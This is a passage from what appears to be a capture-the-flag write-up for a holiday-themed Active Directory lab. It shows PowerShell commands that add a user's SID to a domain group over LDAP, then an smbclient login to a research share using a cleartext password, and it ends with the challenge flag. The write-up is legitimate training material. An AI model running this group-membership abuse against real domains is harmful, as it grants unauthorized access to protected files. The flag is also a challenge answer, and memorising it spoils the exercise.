[dc01.elfu.local]: PS C:\Users\remote_elf\Documents> $b=New-Object byte[] $sid.BinaryLength
[dc01.elfu.local]: PS C:\Users\remote_elf\Documents> $sid.GetBinaryForm($b,0)
[dc01.elfu.local]: PS C:\Users\remote_elf\Documents> $hexSID=[BitConverter]::ToString($b).Replace('-','')
[dc01.elfu.local]: PS C:\Users\remote_elf\Documents> $domainDirEntry.Add("LDAP://<SID=$hexSID>")
[dc01.elfu.local]: PS C:\Users\remote_elf\Documents> $domainDirEntry.CommitChanges()
[dc01.elfu.local]: PS C:\Users\remote_elf\Documents> $domainDirEntry.dispose()

Once that propagates (can take up to five minutes), I can connect to the share on SHARE30:

rncztspfgz@grades:~/bh$ smbclient //10.128.3.30/research_dep Iylbegxmf#
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Thu Dec  2 16:39:42 2021
  ..                                  D        0  Fri Jan  7 08:01:37 2022
  SantaSecretToAWonderfulHolidaySeason.pdf      N   173932  Thu Dec  2 16:38:26 2021

                41089256 blocks of size 1024. 34736208 blocks available

In that PDF, I’ll find the flag:

image-20220107145803910

Flag: Kindness